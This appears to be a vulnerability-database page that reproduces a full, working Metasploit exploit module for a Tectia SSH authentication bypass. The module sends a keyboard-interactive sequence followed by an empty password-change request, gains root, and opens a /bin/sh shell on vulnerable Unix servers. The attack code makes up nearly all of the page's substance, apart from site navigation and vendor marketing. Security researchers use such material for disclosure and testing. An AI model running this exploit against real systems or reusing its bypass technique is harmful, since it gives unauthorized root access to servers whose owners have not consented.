Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Tectia SSH USERAUTH Change Request Password Reset Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 21 Views

Tectia SSH USERAUTH Change Request Password Reset Vulnerability - Unix-based platforms, allows remote user to bypass login routine and gain access as root

Code

                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Tectia SSH USERAUTH Change Request Password Reset Vulnerability",
			'Description'    => %q{
					This module exploits a vulnerability in Tectia SSH server for Unix-based
				platforms.  The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request
				before password authentication, allowing any remote user to bypass the login
				routine, and then gain access as root.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'kingcope',  #Original 0day
					'bperry',
					'sinn3r'
				],
			'References'     =>
				[
					['EDB', '23082'],
					['URL', 'http://seclists.org/fulldisclosure/2012/Dec/12']
				],
			'Payload'        =>
				{
					'Compat' =>
					{
						'PayloadType'    => 'cmd_interact',
						'ConnectionType' => 'find'
					}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					['Unix-based Tectia SSH 6.3.2.33 or prior', {}],
				],
			'Privileged'     => true,
			'DisclosureDate' => "Dec 01 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(22),
				OptString.new('USERNAME', [true, 'The username to login as', 'root'])
			], self.class
		)

		register_advanced_options(
			[
				OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
				OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
			]
		)
	end

	def check
		connect
		banner = sock.get_once
		print_status("#{rhost}:#{rport} - #{banner}")
		disconnect

		return Exploit::CheckCode::Appears if banner =~ /SSH Tectia/
		return Exploit::CheckCode::Safe
	end

	def rhost
		datastore['RHOST']
	end

	def rport
		datastore['RPORT']
	end

	#
	# This is where the login begins.  We're expected to use the keyboard-interactive method to
	# authenticate, but really all we want is skipping it so we can move on to the password
	# method authentication.
	#
	def auth_keyboard_interactive(user, transport)
		print_status("#{rhost}:#{rport} - Going through keyboard-interactive auth...")
		auth_req_pkt = Net::SSH::Buffer.from(
			:byte, 0x32,                     #userauth request
			:string, user,                   #username
			:string, "ssh-connection",       #service
			:string, "keyboard-interactive", #method name
			:string, "",                     #lang
			:string, ""
		)

		user_auth_pkt = Net::SSH::Buffer.from(
			:byte, 0x3D,                     #userauth info
			:raw, 0x01,                      #number of prompts
			:string, "",                     #password
			:raw, "\0"*32                    #padding
		)

		transport.send_message(auth_req_pkt)
		message = transport.next_message
		vprint_status("#{rhost}:#{rport} - Authentication to continue: keyboard-interactive")

		message = transport.next_message
		vprint_status("#{rhost}:#{rport} - Password prompt: #{message.inspect}")

		# USERAUTH INFO
		transport.send_message(user_auth_pkt)
		message = transport.next_message
		vprint_status("#{rhost}:#{rport} - Auths that can continue: #{message.inspect}")

		2.times do |i|
			#USRAUTH REQ
			transport.send_message(auth_req_pkt)
			message = transport.next_message
			vprint_status("#{rhost}:#{rport} - Password prompt: #{message.inspect}")

			# USERAUTH INFO
			transport.send_message(user_auth_pkt)
			message = transport.next_message
			vprint_status("#{rhost}:#{rport} - Auths that can continue: #{message.inspect}")
		end
	end


	#
	# The following link is useful to understand how to craft the USERAUTH password change
	# request packet:
	# http://fossies.org/dox/openssh-6.1p1/sshconnect2_8c_source.html#l00903
	#
	def userauth_passwd_change(user, transport, connection)
		print_status("#{rhost}:#{rport} - Sending USERAUTH Change request...")
		pkt = Net::SSH::Buffer.from(
			:byte, 0x32,               #userauth request
			:string, user,             #username
			:string, "ssh-connection", #service
			:string, "password"        #method name
		)
		pkt.write_bool(true)
		pkt.write_string("")           #Old pass
		pkt.write_string("")           #New pass

		transport.send_message(pkt)
		message = transport.next_message.type
		vprint_status("#{rhost}:#{rport} - Auths that can continue: #{message.inspect}")

		if message.to_i == 52 #SSH2_MSG_USERAUTH_SUCCESS
			transport.send_message(transport.service_request("ssh-userauth"))
			message = transport.next_message.type

			if message.to_i == 6 #SSH2_MSG_SERVICE_ACCEPT
				shell = Net::SSH::CommandStream.new(connection, '/bin/sh', true)
				connection = nil
				return shell
			end
		end
	end

	def do_login(user)
		opts       = {:user=>user, :record_auth_info=>true}
		options    = Net::SSH::Config.for(rhost, Net::SSH::Config.default_files).merge(opts)
		transport  = Net::SSH::Transport::Session.new(rhost, options)
		connection = Net::SSH::Connection::Session.new(transport, options)
		auth_keyboard_interactive(user, transport)
		userauth_passwd_change(user, transport, connection)
	end

	def exploit
		# Our keyboard-interactive is specific to Tectia.  This allows us to run quicker when we're
		# engaging a variety of SSHD targets on a network.
		if check != Exploit::CheckCode::Appears
			print_error("#{rhost}:#{rport} - Host does not seem vulnerable, will not engage.")
			return
		end

		c = nil

		begin
			::Timeout.timeout(datastore['SSH_TIMEOUT']) do
				c = do_login(datastore['USERNAME'])
			end
		rescue Rex::ConnectionError, Rex::AddressInUse
			return
		rescue Net::SSH::Disconnect, ::EOFError
			print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
			return
		rescue Net::SSH::Exception => e
			print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
			return
		rescue ::Timeout::Error
			print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
			return
		end

		handler(c.lsock) if c
	end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
metasploitexploittectia sshvulnerabilityunix-basedremoteauthentication
21